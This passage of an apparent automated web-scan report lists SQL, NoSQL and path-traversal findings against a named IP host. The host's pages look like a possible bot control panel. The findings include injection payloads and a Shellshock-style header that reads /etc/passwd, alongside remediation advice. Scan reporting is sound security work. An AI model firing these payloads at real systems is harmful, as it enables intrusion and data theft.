Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
Validate and/or escape all user input before using it to create an LDAP query. In particular, the following characters (or combinations) should be deny listed:
&
|
!
<
>
=
~=
>=
<=
*
(
)
,
+
-
"
'
;
\
/
NUL character
Reference http://www.testingsecurity.com/how-to-test/injection-vulnerabilities/LDAP-Injection
https://owasp.org/www-community/attacks/LDAP_Injection
Tags OWASP_2021_A03
WSTG-v42-INPV-06
OWASP_2017_A01
CWE Id 90
WASC Id 29
Plugin Id 40015
High
NoSQL Injection - MongoDB
Description
MongoDB query injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Content-Type
Attack
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172//dashboard.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 791 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 205 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 211 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Capture.PNG
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 409 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 423 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//tasks_page.php
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 443 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Content-Type
Attack Content-Type[$ne]
Evidence
Request Header - size: 1,028 bytes.
Request Body - size: 208 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 10
Solution
Do not trust client side input and escape all data on the server side.

Avoid using query input directly in the WHERE and GROUP BY clauses, and upgrade all drivers to the latest available version.
Reference https://arxiv.org/pdf/1506.04082.pdf
https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 943
WASC Id 19
Plugin Id 40033
High
Path Traversal
Description
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.

Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executables necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks exploit special-character sequences.

The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL-encoded characters ("%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.

Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack /login.php
Evidence
Request Header - size: 744 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
Instances 1
Solution
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.

Warning: if you attempt to cleanse your data, then do so in a way that the end result is not in a form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character, resulting in the valid filename "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.

Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.

Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
Reference https://owasp.org/www-community/attacks/Path_Traversal
https://cwe.mitre.org/data/definitions/22.html
Tags OWASP_2021_A01
WSTG-v42-ATHZ-01
OWASP_2017_A05
CWE Id 22
WASC Id 33
Plugin Id 6
High
SQL Injection
Description
SQL injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1" --
Evidence
Request Header - size: 714 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter Sec-Fetch-Site
Attack same-origin%
Evidence
Request Header - size: 699 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter User-Agent
Attack () {:;}; /bin/cat /etc/passwd%' --
Evidence
Request Header - size: 698 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%22+AND+%221%22%3D%221
Method GET
Parameter id
Attack 54" OR "1"="1
Evidence
Request Header - size: 720 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1
Evidence
Request Header - size: 819 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0' AND '1'='1' --
Evidence
Request Header - size: 823 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-Dest
Attack document OR 1=1 --
Evidence
Request Header - size: 818 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-Mode
Attack navigate AND 1=1
Evidence
Request Header - size: 815 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=56-2
Method GET
Parameter id
Attack 56-2
Evidence
Request Header - size: 809 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter sec-ch-ua-platform
Attack "Windows" OR 1=1 --
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1%20AND%201=1
Method GET
Parameter 327qi OR 1=1
Attack 327qi OR 1=1 OR 1=1
Evidence
Request Header - size: 250 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1/Sound%20Effects
Method GET
Parameter 327qi
Attack 327qi OR 1=1
Evidence
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi%' --
Evidence
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi%' --
Evidence
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%20ASC%20%20--%20/error.wav
Method GET
Parameter Sound Effects
Attack Sound Effects ASC --
Evidence
Request Header - size: 456 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%25
Method GET
Parameter Sound Effects
Attack Sound Effects%
Evidence
Request Header - size: 246 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%22+OR+%221%22%3D%221%22+--+
Method GET
Parameter query
Attack query" OR "1"="1" --
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%25%27++--+
Method GET
Parameter query
Attack query%' --
Evidence
Request Header - size: 266 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%25%27++--+&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV%' --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" AND "1"="1" --
Evidence
Request Header - size: 737 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%
Evidence
Request Header - size: 722 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"" OR "1"="1" --
Evidence
Request Header - size: 736 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Sec-Fetch-Site
Attack same-origin%" --
Evidence
Request Header - size: 727 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1" OR "1"="1" --
Evidence
Request Header - size: 736 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54+AND+1%3D1+--+
Method GET
Parameter id
Attack 54 AND 1=1 --
Evidence
Request Header - size: 735 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Accept-Language
Attack en-US,en;q=0.9 OR 1=1 --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Referer
Attack https://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54' OR '1'='1
Evidence
Request Header - size: 782 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0%' --
Evidence
Request Header - size: 776 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"%" --
Evidence
Request Header - size: 776 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter User-Agent
Attack () {:;}; /bin/cat /etc/passwd' AND '1'='1' --
Evidence
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%27++--+
Method GET
Parameter id
Attack 54%' --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27+AND+1%3D1+--+&id=54
Method GET
Parameter value
Attack '1'=1' AND 1=1 --
Evidence
Request Header - size: 784 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%25%27++--+&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter command
Attack '1'=1'%' --
Evidence
Request Header - size: 803 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%22+AND+%221%22%3D%221%22+--+&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV" AND "1"="1" --
Evidence
Request Header - size: 821 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"%' --
Evidence
Request Header - size: 798 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1' AND '1'='1
Evidence
Request Header - size: 804 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54%27+AND+%271%27%3D%271%27+--+
Method GET
Parameter id
Attack 54' OR '1'='1' --
Evidence
Request Header - size: 821 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8%' --
Evidence
Request Header - size: 465 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Accept-Language
Attack en-US,en;q=0.5' OR '1'='1' --
Evidence
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Dest
Attack document%
Evidence
Request Header - size: 460 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Mode
Attack navigate' OR '1'='1' --
Evidence
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Site
Attack none%" --
Evidence
Request Header - size: 465 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' OR '1'='1
Evidence
Request Header - size: 715 bytes.
Request Body - size: 0 bytes.
Response Header - size: 260 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%" --
Evidence
Request Header - size: 710 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1 ASC --
Evidence
Request Header - size: 712 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+%221%22%3D%221%22+--+
Method GET
Parameter id
Attack 54" AND "1"="1" --
Evidence
Request Header - size: 733 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=%22+OR+%221%22%3D%221&customArgs=
Method GET
Parameter dllFunction
Attack " OR "1"="1
Evidence
Request Header - size: 993 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2
Method GET
Parameter id
Attack 56-2
Evidence
Request Header - size: 706 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%25
Method GET
Parameter query
Attack query%
Evidence
Request Header - size: 474 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+
Method GET
Parameter query
Attack query AND 1=1 --
Evidence
Request Header - size: 485 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%22+AND+%221%22%3D%221%22+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW" AND "1"="1" --
Evidence
Request Header - size: 632 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+%271%27%3D%271%27+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' --
Evidence
Request Header - size: 1,090 bytes.
Request Body - size: 208 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW+AND+1%3D1+--+
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 --
Evidence
Request Header - size: 1,075 bytes.
Request Body - size: 129 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter customArgs
Attack OR 1=1 --
Evidence
Request Header - size: 855 bytes.
Request Body - size: 152 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter limit
Attack ' UNION SELECT @@version -- -" OR "1"="1
Evidence
Request Header - size: 855 bytes.
Request Body - size: 160 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- - AND 1=1 --
Evidence
Request Header - size: 855 bytes.
Request Body - size: 152 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%
Evidence
Request Header - size: 856 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter Upgrade-Insecure-Requests
Attack 1' AND '1'='1' --
Evidence
Request Header - size: 871 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=56-2
Method POST
Parameter id
Attack 56-2
Evidence
Request Header - size: 857 bytes.
Request Body - size: 138 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query+AND+1%3D1+--+
Method POST
Parameter query
Attack query AND 1=1 --
Evidence
Request Header - size: 505 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
Instances 60
Solution
Do not trust client-side input, even if there is client-side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40018
High
SQL Injection - Authentication Bypass
Description
SQL injection may be possible on a login page, potentially allowing the application's authentication mechanism to be bypassed
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter sec-ch-ua-platform
Attack "Windows" OR 1=1 --
Evidence
Request Header - size: 635 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW AND 1=1 --
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 129 bytes.
Response Header - size: 253 bytes.
Response Body - size: 0 bytes.
